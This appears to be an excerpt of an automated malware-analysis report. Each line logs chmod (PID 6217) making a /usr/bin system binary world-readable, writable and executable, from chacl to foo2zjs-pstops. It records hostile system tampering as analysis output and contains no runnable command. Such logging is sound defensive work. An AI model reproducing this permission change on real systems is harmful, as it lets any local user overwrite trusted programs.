Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chacl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chage (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chardet3 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chardetect3 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chattr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chcon (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/check-language-support (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chfn (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chgrp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chktrust (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chmod (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/choom (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chown (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chrt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chsh (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/chvt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cifscreds (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ciptool (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ckbcomp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ckeygen3 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cksum (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/clear (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/clear_console (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cli (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cli-al (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cli-csc (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cli-gacutil (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cli-ildasm (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cli-resgen (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cli-sn (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cloud-id (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cloud-init (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cloud-init-per (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cmp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/codepage (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/col (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/col1 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/col2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/col3 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/col4 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/col5 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/col6 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/col7 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/col8 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/col9 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/colcrt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/colormgr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/colrm (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/column (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/comm (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/compose (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/conch3 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/corelist (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cpan (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cpan5.30-x86_64-linux-gnu (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cpio (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cpp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cpp-9 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/crlupdate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/crontab (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/csharp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/csplit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ctail (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ctstat (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cupstestppd (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/curl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cut (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cvt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/cvtsudoers (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dash (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/date (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dbsessmgr4 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dbus-cleanup-sockets (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dbus-daemon (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dbus-launch (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dbus-monitor (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dbus-run-session (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dbus-send (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dbus-update-activation-environment (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dbus-uuidgen (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dc (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dconf (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dd (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ddstdecode (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/deallocvt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/deb-systemd-helper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/deb-systemd-invoke (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-apt-progress (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-communicate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-copydb (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-escape (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-set-selections (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-show (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/delpart (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/delv (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/desktop-file-edit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/desktop-file-install (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/desktop-file-validate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/devdump (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/df (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dfu-tool (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dh_bash-completion (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dh_installxmlcatalogs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dh_perl_openssl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dh_python2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/diff (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/diff3 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dig (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dir (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dircolors (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dirmngr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dirmngr-client (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dirname (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dirsplit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/disco (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dm-tool (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dmcs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dmesg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dnsdomainname (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/do-release-upgrade (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/domainname (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-deb (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-divert (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-maintscript-helper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-query (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-split (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-statoverride (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-trigger (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/driverless (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dtd2rng (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dtd2xsd (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/du (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dumpkeys (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dvipdf (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dwp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eatmydata (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ec2metadata (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/echo (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ed (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/edit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/editor (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/editres (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/egrep (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eject (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/elfedit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/enc2xs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/encguess (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/enchant-2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/enchant-lsmod-2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/engrampa (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/env (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/envsubst (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eps2eps (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eqn (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/erb (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/erb2.7 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/esc-m (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/espeak (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eutp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/evince (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/evince-previewer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/evince-thumbnailer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ex (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/exo-csource (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/exo-desktop-item-edit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/exo-open (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/exo-preferred-applications (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/expand (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/expiry (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/expr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/factor (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/faillog (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fallocate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/false (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-cache (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-cat (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-conflist (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-list (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-match (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-pattern (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-query (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-scan (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-validate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fgconsole (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fgrep (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/file (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/file2brl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/finalrd (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fincore (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/find (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/findmnt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/firefox (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/flock (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fmt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fold (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fonttosfnt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2ddst (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2ddst-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hbpl2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hbpl2-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hiperc (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hiperc-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hp2600-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2lava (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2lava-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2oak (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2oak-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2qpdl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2qpdl-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2slx (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2slx-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2xqx (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2xqx-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2zjs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2zjs-icc2ps (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2zjs-pstops (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
